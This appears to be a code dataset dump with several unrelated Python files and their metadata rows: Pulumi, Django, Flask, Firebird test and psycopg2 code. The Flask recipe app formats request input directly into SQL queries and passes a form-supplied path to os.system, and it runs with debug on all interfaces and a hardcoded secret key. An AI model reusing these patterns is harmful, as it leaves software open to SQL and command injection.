__props__.__dict__["open_shift_version"] = None
__props__.__dict__["plan"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["public_hostname"] = None
__props__.__dict__["refresh_cluster"] = None
__props__.__dict__["router_profiles"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
return OpenShiftManagedCluster(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="agentPoolProfiles")
def agent_pool_profiles(self) -> pulumi.Output[Optional[Sequence['outputs.OpenShiftManagedClusterAgentPoolProfileResponse']]]:
"""
Configuration of OpenShift cluster VMs.
"""
return pulumi.get(self, "agent_pool_profiles")
@property
@pulumi.getter(name="authProfile")
def auth_profile(self) -> pulumi.Output[Optional['outputs.OpenShiftManagedClusterAuthProfileResponse']]:
"""
Configures OpenShift authentication.
"""
return pulumi.get(self, "auth_profile")
@property
@pulumi.getter(name="clusterVersion")
def cluster_version(self) -> pulumi.Output[str]:
"""
Version of OpenShift specified when creating the cluster.
"""
return pulumi.get(self, "cluster_version")
@property
@pulumi.getter
def fqdn(self) -> pulumi.Output[str]:
"""
Service generated FQDN for OpenShift API server loadbalancer internal hostname.
"""
return pulumi.get(self, "fqdn")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="masterPoolProfile")
def master_pool_profile(self) -> pulumi.Output[Optional['outputs.OpenShiftManagedClusterMasterPoolProfileResponse']]:
"""
Configuration for OpenShift master VMs.
"""
return pulumi.get(self, "master_pool_profile")
@property
@pulumi.getter(name="monitorProfile")
def monitor_profile(self) -> pulumi.Output[Optional['outputs.OpenShiftManagedClusterMonitorProfileResponse']]:
"""
Configures Log Analytics integration.
"""
return pulumi.get(self, "monitor_profile")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkProfile")
def network_profile(self) -> pulumi.Output[Optional['outputs.NetworkProfileResponse']]:
"""
Configuration for OpenShift networking.
"""
return pulumi.get(self, "network_profile")
@property
@pulumi.getter(name="openShiftVersion")
def open_shift_version(self) -> pulumi.Output[str]:
"""
Version of OpenShift specified when creating the cluster.
"""
return pulumi.get(self, "open_shift_version")
@property
@pulumi.getter
def plan(self) -> pulumi.Output[Optional['outputs.PurchasePlanResponse']]:
"""
Define the resource plan as required by ARM for billing purposes
"""
return pulumi.get(self, "plan")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The current deployment or provisioning state, which only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="publicHostname")
def public_hostname(self) -> pulumi.Output[str]:
"""
Service generated FQDN or private IP for OpenShift API server.
"""
return pulumi.get(self, "public_hostname")
@property
@pulumi.getter(name="refreshCluster")
def refresh_cluster(self) -> pulumi.Output[Optional[bool]]:
"""
Allows node rotation
"""
return pulumi.get(self, "refresh_cluster")
@property
@pulumi.getter(name="routerProfiles")
def router_profiles(self) -> pulumi.Output[Optional[Sequence['outputs.OpenShiftRouterProfileResponse']]]:
"""
Configuration for OpenShift router(s).
"""
return pulumi.get(self, "router_profiles")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
| 47.514451 | 856 | 0.679927 | 2,475 | 24,660 | 6.471919 | 0.084848 | 0.078974 | 0.069984 | 0.035585 | 0.77107 | 0.690348 | 0.619491 | 0.51517 | 0.478836 | 0.403546 | 0 | 0.003357 | 0.214761 | 24,660 | 518 | 857 | 47.606178 | 0.823848 | 0.200689 | 0 | 0.411215 | 1 | 0 | 0.209171 | 0.108394 | 0 | 0 | 0 | 0 | 0 | 1 | 0.152648 | false | 0.003115 | 0.024922 | 0 | 0.280374 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
40686f7cd56545ec9981f33c3903dd74fd6b1048 | 326 | py | Python | django_drf_server/quiz/migrations/0017_remove_quiz_questions.py | pammalPrasanna/quizie | 3c03552c39ef3d7e613f5b613479df4ef8d44ac1 | [
"MIT"
] | null | null | null | django_drf_server/quiz/migrations/0017_remove_quiz_questions.py | pammalPrasanna/quizie | 3c03552c39ef3d7e613f5b613479df4ef8d44ac1 | [
"MIT"
] | null | null | null | django_drf_server/quiz/migrations/0017_remove_quiz_questions.py | pammalPrasanna/quizie | 3c03552c39ef3d7e613f5b613479df4ef8d44ac1 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.4 on 2021-06-17 02:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('quiz', '0016_auto_20210617_0724'),
]
operations = [
migrations.RemoveField(
model_name='quiz',
name='questions',
),
]
| 18.111111 | 47 | 0.588957 | 35 | 326 | 5.371429 | 0.828571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135371 | 0.297546 | 326 | 17 | 48 | 19.176471 | 0.68559 | 0.138037 | 0 | 0 | 1 | 0 | 0.143369 | 0.082437 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4069e772d72345dc8c5aa0533940bffe33f5921a | 18,348 | py | Python | main.py | khan-git/webRecipies | 4fa9f9bc3c9809f82c5c8fd94dbb604da3443dcb | [
"MIT"
] | null | null | null | main.py | khan-git/webRecipies | 4fa9f9bc3c9809f82c5c8fd94dbb604da3443dcb | [
"MIT"
] | null | null | null | main.py | khan-git/webRecipies | 4fa9f9bc3c9809f82c5c8fd94dbb604da3443dcb | [
"MIT"
] | null | null | null | # -*- coding: iso-8859-1 -*-
import os
import shutil
import datetime
import sqlite3
from flask import Flask, request, session, render_template, g, redirect, url_for, abort, flash, make_response
from random import randint
import json
import urllib2
import json
from json.decoder import JSONObject
from werkzeug.utils import secure_filename
UPLOAD_FOLDER = '/tmp'
ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
DBBACKUPPATH = os.path.abspath('db_backup')
if os.path.exists(DBBACKUPPATH) == False:
os.mkdir(DBBACKUPPATH)
app = Flask(__name__)
#app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
app = Flask(__name__)
app.config.from_object(__name__)
# Load default config and override config from an environment variable
app.config.update(dict(
DATABASE=os.path.join(app.root_path, 'recipes.db'),
SECRET_KEY='development key',
USERNAME='admin',
PASSWORD='default',
UPLOAD_FOLDER='/tmp'
))
app.config['UPPLOAD_FOLDER'] = '/tmp'
app.config.from_envvar('FLASKR_SETTINGS', silent=True)
def connect_db():
"""Connects to the specific database."""
if os.path.exists(app.config['DATABASE']) == False:
cmd = 'sqlite3 recipes.db < database.sql'
os.system(cmd)
rv = sqlite3.connect(app.config['DATABASE'])
rv.row_factory = sqlite3.Row
return rv
def get_db():
"""Opens a new database connection if there is none yet for the
current application context.
"""
if not hasattr(g, 'sqlite_db'):
g.sqlite_db = connect_db()
return g.sqlite_db
@app.teardown_appcontext
def close_db(error):
"""Closes the database again at the end of the request."""
if hasattr(g, 'sqlite_db'):
g.sqlite_db.close()
def init_db():
db = get_db()
with app.open_resource('database.sql', mode='r') as f:
db.cursor().executescript(f.read())
db.commit()
def queryDbFetchOne(query):
"""Query database, return one result"""
db = get_db()
cur = db.cursor()
cur.execute(query)
return cur.fetchone()
def queryDbFetchAll(query):
"""Query database, return one result"""
db = get_db()
cur = db.cursor()
cur.execute(query)
return cur.fetchall()
def getRecipe(recipeKey):
"""Get recipe data"""
return queryDbFetchOne('SELECT * FROM recipes WHERE key="%s"'%recipeKey)
def getIngredients(recipeKey):
"""Get all ingredients for a recipe"""
return queryDbFetchAll('SELECT * FROM recipeAmount WHERE recipeKey="%s"'%recipeKey)
def getNextKey():
"""Get next number for key"""
currentHighKey = queryDbFetchOne('SELECT key FROM recipes ORDER BY key DESC')
if currentHighKey is None:
print "IS none %s"%currentHighKey
currentHighKey = 0
else:
currentHighKey = int(currentHighKey[0])
return currentHighKey +1
def insertIntoDb(table, names, values):
"""Insert into database"""
if len(values) != len(names):
return None
query = 'INSERT INTO %s (%s) VALUES(%s)'%(table, ', '.join(names), ', '.join(values))
rowId = None
try:
db = get_db()
cur = db.cursor()
cur = get_db().cursor()
cur.execute(query)
db.commit()
rowId = cur.lastrowid
except:
db.rollback()
finally:
return rowId
def doRawQuery(query):
"""Do a raw query"""
rowId = None
try:
db = get_db()
cur = db.cursor()
cur = get_db().cursor()
cur.execute(query)
db.commit()
rowId = cur.lastrowid
except:
db.rollback()
finally:
return rowId
def updateDb(table, names, values, where):
"""Update row in table"""
if len(values) != len(names):
return None
query = 'UPDATE %s SET '%(table)
qPairs = []
for name, value in zip(names,values):
qPairs.append('%s=%s'%(name,value))
query += ', '.join(x for x in qPairs)
query += ' %s'%where
rowId = None
try:
db = get_db()
cur = db.cursor()
cur = get_db().cursor()
cur.execute(query)
db.commit()
rowId = cur.lastrowid
except:
db.rollback()
finally:
return rowId
@app.route('/prepdb')
def prepdb():
"""Prepare database from json file"""
f = open('recipes.json','r')
buff = f.read()
recipes = json.loads(buff)
for item in recipes:
recipeKey = getNextKey()
rowId = insertIntoDb('recipes', ['key', 'title','instructions', 'portions'],
[recipeKey, '"%s"'%item['title'], '"%s"'%item['instructions'], item['portions']])
for ingredient in item['ingredients']:
keys = ingredient.keys()
keys.insert(0, 'recipeKey')
values = ingredient.values()
values.insert(0, recipeKey)
rId = insertIntoDb('recipeAmount', keys, values)
for group in item['recipeTag']:
insertIntoDb('recipeTag', ['recipeKey', 'group'], [recipeKey, '"%s"'%group])
if 'fridge' in item:
insertIntoDb('fridge', ['recipeKey', 'portions'], [recipeKey, item['fridge']])
print " Fridge %d"%item['fridge']
else:
print "No fridge"
return index()
@app.cli.command('initdb')
def initdb_command():
"""Initializes the database."""
init_db()
print 'Initialized the database.'
@app.route('/help')
def help():
values = {'pageId': 'help',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('help.html', **values)
@app.route('/')
def index():
values = {'pageId': 'index',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('index.html', **values)
# return redirect('login', code=304)
@app.route('/login', methods=['GET','POST'])
def login():
error = None
if request.method == 'POST':
if request.form['username'] != 'admin' or request.form['password'] != 'admin':
error = 'Invalid Credentials. Please try again.'
else:
return redirect(url_for('favourite'), code=304)
values = {'pageId': 'index',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048),
'error': error
}
return render_template('login.html', **values)
@app.route('/editRecipe', methods=['GET'])
def editRecipe():
return newRecipe(request.args['recipeKey'])
@app.route('/deleteRecipe', methods=['GET'])
def deleteRecipe():
# TODO
if 'recipeKey' in request.args:
pass
pass
def deleteAmount(recipeKey):
query = 'DELETE FROM recipeAmount WHERE recipeKey=%s'%recipeKey
try:
db = get_db()
cur = db.cursor()
cur = get_db().cursor()
cur.execute(query)
db.commit()
rowId = cur.lastrowid
except:
db.rollback()
msg = "error in delete operation"
print msg
finally:
return rowId
@app.route('/newRecipe')
def newRecipe(recipeKey=None):
if recipeKey is not None:
recipe = getRecipe(recipeKey)
ingredients = getIngredients(recipeKey)
else:
recipe = None
ingredients = None
entries = queryDbFetchAll('SELECT name FROM ingredients ')
measurements = queryDbFetchAll('SELECT short FROM measurements ')
values = {'ingredientsList': entries,
'measurements':measurements,
'recipe':recipe,
'ingredients':ingredients,
'pageId': 'newRecipe',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('newRecipe.html', **values)
@app.route('/error')
def errorHtml():
values = {'pageId': 'error',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('error.html', **values)
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
@app.route('/saveRecipe', methods=['POST'])
def saveRecipe():
# TODO add last update time
title = request.form['title']
names = ['title']
values = ['"%s"'%title]
if 'instructions' in request.form:
names.append('instructions')
values.append('"%s"'%request.form['instructions'])
if 'portions' in request.form:
names.append('portions')
values.append(request.form['portions'])
if 'recipeKey' in request.form:
recipeKey = request.form['recipeKey']
updateDb('recipes', names, values, 'WHERE key=%s'%recipeKey)
else:
recipeKey = getNextKey()
names.insert(0, 'key')
values.insert(0, '%d'%recipeKey)
if insertIntoDb('recipes', names, values) is None:
return json.dumps({'redirect':'false', 'result': 'Error creating recipe'})
amount = request.form.getlist('amount')
measurement = request.form.getlist('measurement')
ingredients = request.form.getlist('ingredient')
deleteAmount(recipeKey)
for a,m,i in zip(amount, measurement, ingredients):
names = ['recipeKey', 'ingredient', 'amount', 'measurement']
values = [str(recipeKey), '"%s"'%i, str(a), '"%s"'%m]
if insertIntoDb('recipeAmount', names, values) is None:
return json.dumps({'redirect':'false', 'result': 'Error creating recipe'})
return json.dumps({'redirect':True, 'url': '/show/recipe?recipe=%s'%recipeKey})
@app.route('/show/recipe', methods=['GET'])
def showRecipe():
recipeKey = request.args.get('recipe')
recipe = getRecipe(recipeKey)
return displayRecipe(recipe)
def displayRecipe(recipe):
values = {'key':recipe['key'],
'title': recipe['title'],
'instructions': recipe['instructions'],
'portions': recipe['portions'],
'ingredients': getIngredients(recipe['key']),
'pageId': 'displayRecipe',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('displayRecipe_template.html', **values)
@app.route('/randomRecipe', methods=['GET'])
def randomRecipe():
recipes = queryDbFetchAll('SELECT * FROM recipes ORDER BY RANDOM() LIMIT 4')
return render_template('listRecipes.html', header='Förslag:', lastRecipes=recipes)
@app.route('/menuSuggestion', methods=['GET'])
def menuSuggestion():
recipes = queryDbFetchAll('SELECT * FROM recipes ORDER BY RANDOM() LIMIT 4')
if 'update' in request.args:
return render_template('onlyList.html', lastRecipes=recipes)
values = {'pagetitle':'Receptakuten',
'title': 'Förslag:',
'lastRecipes': recipes,
'refresh': 'true',
'pageId': 'menuSuggestion',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('listRecipes.html', **values)
@app.route('/ajax/search', methods=['GET'])
def searchAjax():
if request.method == 'GET':
patterns = request.args.getlist('searchPatterns[]')
query = ''
for p in patterns:
if len(query) > 0:
query = '%s or '%query
query += 'title LIKE "%%%s%%" or instructions LIKE "%%%s%%"'%(p, p)
query = 'SELECT key, title FROM recipes WHERE %s LIMIT 10'%query
results = queryDbFetchAll(query)
t = []
for p in results:
h = {}
for k in p.keys():
h[k] = p[k]
t.append(h)
return json.dumps(t)
@app.route('/ajax/searchIngredient', methods=['GET'])
def searchIngredient():
if request.method == 'GET':
patterns = request.args.getlist('searchPatterns[]')
print patterns
query = ''
for p in patterns:
if len(query) > 0:
query = '%s or '%query
query += 'ingredient LIKE "%%%s%%"'%(p)
query = 'SELECT DISTINCT ingredient FROM recipeAmount WHERE %s'%query
print query
results = queryDbFetchAll(query)
t = []
for p in results:
h = {}
for k in p.keys():
h[k] = p[k]
t.append(h)
return json.dumps(t)
@app.route('/search')
def search():
values = {'pageId': 'search',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('search.html', **values)
def getFridgeJSON():
fridgeContent = queryDbFetchAll('SELECT key, title, fridge.portions AS portions FROM recipes INNER JOIN fridge ON recipes.key = fridge.recipeKey')
fridgeJson = []
for row in fridgeContent:
rowJson = {}
for key in row.keys():
rowJson[key] = row[key]
fridgeJson.append(rowJson)
return json.dumps(fridgeJson)
@app.route('/fromTheFridge')
def fromTheFridge():
values = {'pageId': 'fromTheFridge',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('whatsinthefridge.html', **values)
# Update fridge content
@app.route('/ajax/updateFridge', methods=['GET','POST'])
def updateFridge():
if request.method == 'POST':
recipesJson = request.form.getlist('recipes')
recipes = json.loads(recipesJson[0])
keys = []
for item in recipes:
keys.append(item['key'])
queryUpdate = 'UPDATE fridge SET portions=%d WHERE recipeKey=%d'%(item['portions'], item['key'])
queryInsert = 'INSERT INTO fridge (recipeKey, portions) SELECT %d,%d WHERE(Select Changes() = 0)'%(item['key'], item['portions'])
doRawQuery(queryUpdate)
doRawQuery(queryInsert)
currentKeys = queryDbFetchAll('SELECT recipeKey FROM fridge ORDER BY recipeKey')
for key in currentKeys:
if key['recipeKey'] not in keys:
deleteQuery = 'DELETE FROM fridge WHERE recipeKey=%s'%key['recipeKey']
doRawQuery(deleteQuery)
return getFridgeJSON()
@app.route('/groceryList')
def groceryList():
recipes = queryDbFetchAll('SELECT key, title, portions FROM recipes ORDER BY title')
ingredients = {}
for recipe in recipes:
ingredients[recipe['key']] = getIngredients(recipe['key'])
values = {'pageId': 'groceryList',
'recipes': recipes,
'ingredients': ingredients,
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('groceryList.html', **values)
@app.route('/favourite')
def favourite():
"""Show favourite recipes"""
values = {'pageId': 'favouritePage',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('favourite.html', **values)
@app.route('/ajax/getRecipesJson', methods=['GET','POST'])
def getRecipesJson():
if request.method == 'POST':
recipeKeys = request.form.getlist('recipe')
query = 'SELECT * FROM recipes where '
qyeryKeys = []
for recipes in recipeKeys:
jsonKeys = json.loads(recipes)
for key in jsonKeys:
qyeryKeys.append('key=%s'%key['recipeKey'])
query += ' OR '.join(qyeryKeys)
recipeList = queryDbFetchAll(query)
jsonReply = []
for rowRecipe in recipeList:
tmpJson = {}
for key in rowRecipe.keys():
tmpJson[key] = rowRecipe[key]
ingredientsJson = []
for row in getIngredients(rowRecipe['key']):
tmpIngredient = {}
for key in row.keys():
if key == 'recipeKey':
continue
tmpIngredient[key] = row[key]
ingredientsJson.append(tmpIngredient)
tmpJson['ingredients'] = ingredientsJson
jsonReply.append(tmpJson)
return json.dumps(jsonReply)
recipes = queryDbFetchAll('SELECT key, title FROM recipes')
rows = []
for i in recipes:
rows.append(dict(i))
return json.dumps(rows)
@app.route('/manifest.json')
def manifestJSON():
return url_for('static', filename='manifest.json')
@app.route('/manifest.appcache')
def manifest():
res = make_response(render_template('manifest.appcache'), 200)
res.headers["Content-Type"] = "text/cache-manifest"
return res
@app.route('/admin/restore', methods = ['POST'])
def dorestore():
versionF = os.path.abspath(os.path.join(DBBACKUPPATH, request.form.get('version')))
if os.path.exists(versionF):
now = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
name = '%s_bfrestore.sql'%now
dobackup(name)
tables = queryDbFetchAll('SELECT name FROM sqlite_master WHERE type = "table"')
for tab in tables:
doRawQuery('DROP TABLE %s'%tab['name'])
cmd = 'sqlite3 recipes.db < %s'%versionF
os.system(cmd)
return getstatus()
@app.route('/admin/backup')
def adminbackup():
now = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
dobackup(now+'.sql')
return getstatus()
def dobackup(name):
dbF = open(os.path.join(DBBACKUPPATH, name), 'w')
con = get_db()
dbF.write('\n'.join(con.iterdump()).encode('utf8'))
dbF.close()
@app.route('/admin/status')
def getstatus():
status = {}
status['num_of_recipes'] = queryDbFetchOne('SELECT count(*) as rows FROM recipes')['rows']
status['num_of_fridge'] = queryDbFetchOne('SELECT count(*) as rows FROM fridge')['rows']
status['num_of_ingredients'] = queryDbFetchOne('SELECT count(*) as rows FROM (SELECT DISTINCT ingredient FROM recipeAmount)')['rows']
status['backups'] = sorted(os.listdir(DBBACKUPPATH), reverse=True)
return json.dumps(status, sort_keys=True, indent=4, separators=(',', ': '))
@app.route('/admin')
def adminpage():
values = {'pageId': 'adminPage',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('admin.html', **values)
if __name__ == "__main__":
# import logging
# file_handler = RotatingFileHandler('/tmp/receptakuten.log', bakupCount=5)
# file_handler.setLevel(logging.WARNING)
# app.logger.addHandler(file_handler)
app.run(host="0.0.0.0", debug=True)
# app.run(debug=True)
| 33 | 150 | 0.601373 | 2,018 | 18,348 | 5.418236 | 0.184836 | 0.019023 | 0.025608 | 0.032925 | 0.269984 | 0.225626 | 0.208432 | 0.20386 | 0.19764 | 0.125389 | 0 | 0.00772 | 0.25169 | 18,348 | 555 | 151 | 33.059459 | 0.788638 | 0.023545 | 0 | 0.307359 | 0 | 0.004329 | 0.214245 | 0.005297 | 0 | 0 | 0 | 0.001802 | 0 | 0 | null | null | 0.008658 | 0.02381 | null | null | 0.015152 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
406a21613d9b1dbc55f543cfe42bc9ef9b68a79c | 1,749 | py | Python | tests/bugs/core_2678_test.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | [
"MIT"
] | 1 | 2022-02-05T11:37:13.000Z | 2022-02-05T11:37:13.000Z | tests/bugs/core_2678_test.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | [
"MIT"
] | 1 | 2021-09-03T11:47:00.000Z | 2021-09-03T12:42:10.000Z | tests/bugs/core_2678_test.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | [
"MIT"
] | 1 | 2021-06-30T14:14:16.000Z | 2021-06-30T14:14:16.000Z | #coding:utf-8
#
# id: bugs.core_2678
# title: Full outer join cannot use available indices (very slow execution)
# decription:
# tracker_id: CORE-2678
# min_versions: ['3.0']
# versions: 3.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = []
init_script_1 = """"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
create table td_data1 (
c1 varchar(20) character set win1251 not null collate win1251,
c2 integer not null,
c3 date not null,
d1 float not null
);
create index idx_td_data1 on td_data1(c1,c2,c3);
commit;
create table td_data2 (
c1 varchar(20) character set win1251 not null collate win1251,
c2 integer not null,
c3 date not null,
d2 float not null
);
create index idx_td_data2 on td_data2(c1,c2,c3);
commit;
set planonly;
select
d1.c1, d2.c1,
d1.c2, d2.c2,
d1.c3, d2.c3,
coalesce(sum(d1.d1), 0) t1,
coalesce(sum(d2.d2), 0) t2
from td_data1 d1
full join td_data2 d2
on
d2.c1 = d1.c1
and d2.c2 = d1.c2
and d2.c3 = d1.c3
group by
d1.c1, d2.c1,
d1.c2, d2.c2,
d1.c3, d2.c3;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
PLAN SORT (JOIN (JOIN (D2 NATURAL, D1 INDEX (IDX_TD_DATA1)), JOIN (D1 NATURAL, D2 INDEX (IDX_TD_DATA2))))
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_stdout == act_1.clean_expected_stdout
| 23.958904 | 109 | 0.619211 | 273 | 1,749 | 3.787546 | 0.326007 | 0.054159 | 0.038685 | 0.023211 | 0.255319 | 0.255319 | 0.255319 | 0.201161 | 0.201161 | 0.201161 | 0 | 0.101575 | 0.273871 | 1,749 | 72 | 110 | 24.291667 | 0.712598 | 0.142367 | 0 | 0.326531 | 0 | 0.020408 | 0.677419 | 0 | 0 | 0 | 0 | 0 | 0.020408 | 1 | 0.020408 | false | 0 | 0.040816 | 0 | 0.061224 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
406bff6901669314a484753b5d5e8d18397cb7b2 | 3,693 | py | Python | flask-app/web_app/storage_manager/storage_manager.py | PetrMokrov/back_end_project | 4dd58d61e637d10872fe58a154dc89f6d0829d94 | [
"MIT"
] | null | null | null | flask-app/web_app/storage_manager/storage_manager.py | PetrMokrov/back_end_project | 4dd58d61e637d10872fe58a154dc89f6d0829d94 | [
"MIT"
] | null | null | null | flask-app/web_app/storage_manager/storage_manager.py | PetrMokrov/back_end_project | 4dd58d61e637d10872fe58a154dc89f6d0829d94 | [
"MIT"
] | 1 | 2019-04-02T12:30:13.000Z | 2019-04-02T12:30:13.000Z | #!/usr/bin/env python
import psycopg2
import time
from ..models import User
class StorageManager:
def __init__(self):
self.conn = None
self._connect()
self._create_table()
def _connect(self):
while True:
try:
self.conn = psycopg2.connect(
host='storage',
database='app_storage',
user='admin',
password='admin'
)
except psycopg2.Error:
print('Cannot connect to database, sleeping 3 seconds')
time.sleep(3)
else:
break
def _create_table(self):
while True:
try:
cursor = self.conn.cursor()
cursor.execute('CREATE TABLE IF NOT EXISTS users \
(id SERIAL PRIMARY KEY, login VARCHAR(128), \
email VARCHAR(128), hash_password VARCHAR(132), \
confirmed BOOLEAN)')
except psycopg2.Error:
print('Database error, reconnecting')
self._connect()
else:
break
def insert(self, user):
'''
If insert is success, the function returns true,
Else, it returns false
'''
while True:
try:
if self.select(user.login, category='login') is not None:
return False
cursor = self.conn.cursor()
cursor.execute('INSERT INTO users(login, email, hash_password, confirmed) \
VALUES (%s, %s, %s, %s)', (user.login, user.email, user.hash_password, user.confirmed))
self.conn.commit()
return True
except psycopg2.Error:
print('Database error, reconnecting')
time.sleep(1)
self._connect()
else:
break
def select(self, value, category='login'):
'''
The function returns None, if there is no user with very value of
category, else it returns User instance
'''
while True:
try:
cursor = self.conn.cursor()
cursor.execute('SELECT * FROM users WHERE %s = %%s' % category, (value,))
self.conn.commit()
fetch = cursor.fetchall()
if len(fetch) == 0:
return None
user = User(fetch[0][1], fetch[0][2])
user.id = fetch[0][0]
user.hash_password = fetch[0][3]
user.confirmed = fetch[0][4]
return user
except psycopg2.Error:
print('Database error, reconnecting')
time.sleep(1)
self._connect()
else:
break
def confirm(self, value, category='login'):
'''
The function sets \'confirmed\' parameter of the user with very value
of category as True\n
If such user not found, returns False, else returns True
'''
while True:
try:
if self.select(value, category=category) is not None:
cursor = self.conn.cursor()
cursor.execute('UPDATE users SET confirmed = TRUE WHERE %s = %%s' % category, (value,))
self.conn.commit()
return True
else:
return False
except psycopg2.Error:
print('Database error, reconnecting')
time.sleep(1)
self._connect()
else:
break
| 33.572727 | 107 | 0.479285 | 360 | 3,693 | 4.863889 | 0.272222 | 0.041119 | 0.034266 | 0.068532 | 0.423187 | 0.390634 | 0.256996 | 0.229012 | 0.190177 | 0.138778 | 0 | 0.015195 | 0.429732 | 3,693 | 109 | 108 | 33.880734 | 0.816239 | 0.093149 | 0 | 0.563218 | 0 | 0 | 0.087238 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0.057471 | 0.034483 | 0 | 0.183908 | 0.057471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
407208de4a5ad6967ea27d59e0496b7b2dfa6fe5 | 747 | py | Python | meiduo_mall/meiduo_mall/apps/meiduo_admin/views/spus.py | aGrass0825/meiduo_project | 78c560c1e9a3205d4958ddbe798cd0ab2be41830 | [
"MIT"
] | null | null | null | meiduo_mall/meiduo_mall/apps/meiduo_admin/views/spus.py | aGrass0825/meiduo_project | 78c560c1e9a3205d4958ddbe798cd0ab2be41830 | [
"MIT"
] | null | null | null | meiduo_mall/meiduo_mall/apps/meiduo_admin/views/spus.py | aGrass0825/meiduo_project | 78c560c1e9a3205d4958ddbe798cd0ab2be41830 | [
"MIT"
] | null | null | null | from rest_framework.generics import ListAPIView
from rest_framework.permissions import IsAdminUser
from goods.models import SPU, SPUSpecification
from meiduo_admin.serializers.spus import SPUSimpleSerializer, SPUSpecSerializer
class SPUSimpleView(ListAPIView):
permission_classes = [IsAdminUser]
queryset = SPU.objects.all()
serializer_class = SPUSimpleSerializer
# GET/meiduo_admin/goods/(?P<pk>\d+)/specs/
class SPUSpecView(ListAPIView):
"""获取SPU商品的规格选项数据"""
permission_classes = [IsAdminUser]
# 指定视图类所使用的查询集
def get_queryset(self):
pk = self.kwargs['pk']
specs = SPUSpecification.objects.filter(spu_id=pk)
return specs
# 指定视图类所使用的序列化器类
serializer_class = SPUSpecSerializer
